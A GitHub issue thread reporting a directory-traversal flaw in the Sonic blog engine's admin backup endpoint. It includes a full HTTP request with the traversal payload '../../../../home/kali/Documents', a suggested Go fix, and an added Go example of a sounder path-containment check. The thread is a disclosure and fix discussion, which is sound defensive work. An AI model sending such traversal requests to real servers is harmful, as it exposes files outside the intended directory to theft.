
Back up files in any directory through directory traversal #56

Closed
yuyan-sec opened this issue Dec 5, 2022 · 3 comments · Fixed by #61
Labels
bug Something isn't working

Comments

@yuyan-sec

Checklist

What is version of Sonic has the issue?

1.0.4

What database are you using?

SQLite3

What is your deployment method?

Executable file

Your site address.

No response

What happened?

Vulnerability Version

1.0.4

Reproduction environment

  • Kali Linux
  • Go 1.19.1

Vulnerability description and reproduction

Requires logging in to the admin backend first.
Back up files in any directory through directory traversal.

POST /api/admin/backups/work-dir HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 35
Admin-Authorization: 0996683e-0fab-46ec-936d-953d43be8048
Accept: application/json, text/plain, */*
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-platform: "Linux"
Content-Type: application/json
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/admin/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

["../../../../home/kali/Documents"]


Relevant log output

No response

Additional information

No response

@yuyan-sec yuyan-sec added the bug Something isn't working label Dec 5, 2022
@yuyan-sec (Author)

Fix suggestion

Add a path check in service/impl/backup.go so that only files under the site directory can be backed up. See the zip feature for reference: http://bit.ly/2MsjAWE

// toBackupPath must already be the cleaned, absolute path; a prefix test on
// the raw request string would still let "../" segments through.
if !strings.HasPrefix(toBackupPath, b.Config.Sonic.WorkDir) {
    return nil, xerr.NoType.New("").WithMsg(toBackupPath + " illegal file path").WithStatus(xerr.StatusInternalServerError)
}

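The suggestion above relies on a bare prefix comparison. As an added example (not the project's code, and not the fix merged in #61), the following Go program shows why the comparison must run on a cleaned path and why a prefix test alone is not a containment test: a sibling directory such as /opt/sonic-data shares the prefix /opt/sonic and would pass. The work directory /opt/sonic, the request layout (paths relative to the work directory or absolute) and the function names are assumptions made for the example.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideWorkDir is returned for any request that does not resolve to a
// location at or below the configured work directory.
var ErrOutsideWorkDir = errors.New("illegal file path: outside work dir")

// candidatePath turns a request into the cleaned path the backup would read.
// filepath.Join and filepath.Clean collapse "../" segments, so the check
// below operates on the real target, not on the raw request string.
func candidatePath(base, requested string) string {
	if filepath.IsAbs(requested) {
		return filepath.Clean(requested)
	}
	return filepath.Join(base, requested)
}

// PrefixOnlyCheck mirrors a bare strings.HasPrefix test (assumed shape of the
// suggestion above). It blocks "../" escapes once the path is cleaned, but it
// also accepts any sibling directory whose name merely starts with workDir.
func PrefixOnlyCheck(workDir, requested string) bool {
	base := filepath.Clean(workDir)
	return strings.HasPrefix(candidatePath(base, requested), base)
}

// ResolveBackupPath returns the cleaned path for a backup request, or
// ErrOutsideWorkDir if the request escapes workDir. It uses filepath.Rel so
// that only genuine descendants of workDir are accepted.
func ResolveBackupPath(workDir, requested string) (string, error) {
	base := filepath.Clean(workDir)
	candidate := candidatePath(base, requested)
	rel, err := filepath.Rel(base, candidate)
	if err != nil {
		return "", ErrOutsideWorkDir
	}
	// A relative path of ".." or starting with "../" points above base.
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideWorkDir
	}
	return candidate, nil
}

func main() {
	workDir := "/opt/sonic" // constructed work directory for the example
	requests := []string{
		"uploads",                         // legitimate sub-directory
		"../../../../home/kali/Documents", // payload from the report
		"/opt/sonic-data/secrets",         // sibling directory sharing the prefix
	}
	for _, req := range requests {
		p, err := ResolveBackupPath(workDir, req)
		fmt.Printf("%-35q prefix-only=%-5v resolved=%q err=%v\n",
			req, PrefixOnlyCheck(workDir, req), p, err)
	}
}
```

If the work directory may contain symlinks, resolve both sides with filepath.EvalSymlinks before calling filepath.Rel; the example skips that step so it runs without touching the filesystem.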
@yuyan-sec (Author)

(screenshot attached: image-20221206153826274)

@1379 (Contributor)

1379 commented Dec 15, 2022

Thank you, I have fixed this problem.
